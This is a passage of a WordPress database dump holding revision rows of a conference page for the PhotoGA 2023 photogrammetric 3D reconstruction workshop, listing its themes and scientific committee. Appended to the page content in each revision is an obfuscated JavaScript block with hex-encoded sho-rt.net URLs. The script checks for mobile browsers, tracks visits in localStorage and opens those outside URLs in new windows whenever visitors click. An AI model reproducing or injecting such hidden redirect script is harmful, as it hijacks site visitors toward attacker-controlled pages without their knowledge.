)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:03:11','2022-12-16 14:03:11','',3449,'https://gsw2023.com/?p=3474',0,'revision','',0),
(3475,1,'2022-12-16 14:04:47','2022-12-16 14:04:47','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6>Novel approaches to image orientation</h6>\n</li>\n<li>\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\n</li>\n<li>\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\n</li>\n<li>\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\n</li>\n<li>\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\n</li>\n<li>\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\n</li>\n</ul>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>\n<h6>Ronny Hänsch, Germany</h6>\n</li>\n<li>\n<h6>Mozhdeh Shahbazi, Canada</h6>\n</li>\n<li>\n<h6>Ewelina Rupnik, France</h6>\n</li>\n<li>\n<h6>Petra Helmholz, Australia</h6>\n</li>\n<li>\n<h6>Jianzhu Huai, China</h6>\n</li>\n<li>\n<h6>Michael Schmitt, Germany</h6>\n</li>\n<li>\n<h6>Dimitri Bulatov, Germany</h6>\n</li>\n<li>\n<h6>Saeid Homayouni, Canada</h6>\n</li>\n<li>\n<h6>David Belton, Australia</h6>\n</li>\n<li>\n<h6>Ahmed Shaker, Canada</h6>\n</li>\n<li>\n<h6>Gunho Sohn, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Photogrammetric 3D Reconstruction for Geo-Applications (PhotoGA 2023)','','inherit','closed','closed','','3449-revision-v1','','','2022-12-16 14:04:47','2022-12-16 14:04:47','',3449,'https://gsw2023.com/?p=3475',0,'revision','',0),
(3476,1,'2022-12-16 14:05:02','2022-12-16 14:05:02','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">This workshop focuses on algorithms and approaches for photogrammetric 3D reconstruction in the context of geospatial applications. The workshop addresses experts from photogrammetry, remote sensing, and computer vision fields in both academia and industry. Contributions are invited from all researchers and practitioners to cover the following core topics: models and methods for image orientation, multi-source data alignment and fusion, 3D data acquisition and surface reconstruction, image sequence analysis, multi-view geometry, and structure-from-motion (SfM) for data acquired from terrestrial, drone, airborne and spaceborne platforms, as well as the geo-applications of these methods.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3465\" img_size=\"1200x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"63\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6>Novel approaches to image orientation</h6>\n</li>\n<li>\n<h6>Orientation of unconventional images such as oblique images, images from cameras with rolling shutter, RGBD images, crowd-sourced images, historical images, and thermal infrared images</h6>\n</li>\n<li>\n<h6>Multimodal image matching for alignment, registration and fusion of multi-source imagery, e.g. optical and radar images</h6>\n</li>\n<li>\n<h6>Geometric, algebraic and learning-based approaches to multi-view stereo and structure-from-motion (SfM)</h6>\n</li>\n<li>\n<h6>Modern approaches in image orientation and bundle adjustment (BA), e.g. single-image calibration, online calibration, methods for handling ambiguous and degenerate configurations, large-scale BA, and structureless BA</h6>\n</li>\n<li>\n<h6>3D mapping and monitoring applications with focus on photogrammetric aspects, such as precision agriculture, forest inventory, structural health monitoring, traffic surveillance, disaster readiness and response, etc.</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Scientific Committee:</u></h5>\n<ul>\n<li>\n<h6>Ronny Hänsch, Germany</h6>\n</li>\n<li>\n<h6>Mozhdeh Shahbazi, Canada</h6>\n</li>\n<li>\n<h6>Ewelina Rupnik, France</h6>\n</li>\n<li>\n<h6>Petra Helmholz, Australia</h6>\n</li>\n<li>\n<h6>Jianzhu Huai, China</h6>\n</li>\n<li>\n<h6>Michael Schmitt, Germany</h6>\n</li>\n<li>\n<h6>Dimitri Bulatov, Germany</h6>\n</li>\n<li>\n<h6>Saeid Homayouni, Canada</h6>\n</li>\n<li>\n<h6>David Belton, Australia</h6>\n</li>\n<li>\n<h6>Ahmed Shaker, Canada</h6>\n</li>\n<li>\n<h6>Gunho Sohn, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 